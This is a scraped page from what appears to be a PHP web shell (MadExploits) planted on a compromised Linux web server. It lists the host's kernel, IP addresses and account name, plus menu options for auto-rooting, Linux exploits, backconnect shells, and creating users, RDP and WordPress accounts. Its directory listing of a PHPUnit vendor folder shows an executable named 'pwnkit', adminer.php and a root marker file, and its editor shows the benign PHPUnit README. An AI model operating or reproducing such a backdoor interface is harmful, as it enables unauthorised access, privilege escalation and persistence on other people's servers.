Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.88
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
.trash /
vendor /
phpunit /
phpunit /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.editorconfig
115
B
-rw-r--r--
.gitattributes
38
B
-rw-r--r--
.gitignore
315
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.php_cs.dist
6.5
KB
-rw-r--r--
.travis.yml
2.05
KB
-rw-r--r--
ChangeLog-6.5.md
3.29
KB
-rw-r--r--
ChangeLog-7.0.md
3.06
KB
-rw-r--r--
ChangeLog-7.1.md
2.26
KB
-rw-r--r--
LICENSE
1.51
KB
-rw-r--r--
README.md
2.63
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
appveyor.yml
2.3
KB
-rw-r--r--
build.xml
18.61
KB
-rw-r--r--
composer.json
2.2
KB
-rw-r--r--
phpstan-tests.neon
897
B
-rw-r--r--
phpstan.neon
316
B
-rw-r--r--
phpunit
1.25
KB
-rw-r--r--
phpunit.xml
1.03
KB
-rw-r--r--
phpunit.xsd
13.42
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# PHPUnit PHPUnit is a programmer-oriented testing framework for PHP. It is an instance of the xUnit architecture for unit testing frameworks. [](https://packagist.org/packages/phpunit/phpunit) [](https://php.net/) [](https://phpunit.de/build-status.html) ## Installation We distribute a [PHP Archive (PHAR)](https://php.net/phar) that has all required (as well as some optional) dependencies of PHPUnit bundled in a single file: ```bash $ wget https://phar.phpunit.de/phpunit.phar $ chmod +x phpunit.phar $ mv phpunit.phar /usr/local/bin/phpunit ``` You can also immediately use the PHAR after you have downloaded it, of course: ```bash $ wget https://phar.phpunit.de/phpunit.phar $ php phpunit.phar ``` Alternatively, you may use [Composer](https://getcomposer.org/) to download and install PHPUnit as well as its dependencies. Please refer to the [documentation](https://phpunit.de/documentation.html) for details on how to do this. ## Contribute Please refer to [CONTRIBUTING.md](https://github.com/sebastianbergmann/phpunit/blob/master/.github/CONTRIBUTING.md) for information on how to contribute to PHPUnit and its related projects. ## List of Contributors Thanks to everyone who has contributed to PHPUnit! You can find a detailed list of contributors on every PHPUnit related package on GitHub. This list shows only the major components: * [PHPUnit](https://github.com/sebastianbergmann/phpunit/graphs/contributors) * [php-code-coverage](https://github.com/sebastianbergmann/php-code-coverage/graphs/contributors) * [phpunit-mock-objects](https://github.com/sebastianbergmann/phpunit-mock-objects/graphs/contributors) A very special thanks to everyone who has contributed to the documentation and helps maintain the translations: * [English](https://github.com/sebastianbergmann/phpunit-documentation-english/graphs/contributors) * [Spanish](https://github.com/sebastianbergmann/phpunit-documentation-spanish/graphs/contributors) * [French](https://github.com/sebastianbergmann/phpunit-documentation-french/graphs/contributors) * [Japanese](https://github.com/sebastianbergmann/phpunit-documentation-japanese/graphs/contributors) * [Brazilian Portuguese](https://github.com/sebastianbergmann/phpunit-documentation-brazilian-portuguese/graphs/contributors) * [Simplified Chinese](https://github.com/sebastianbergmann/phpunit-documentation-chinese/graphs/contributors)
Close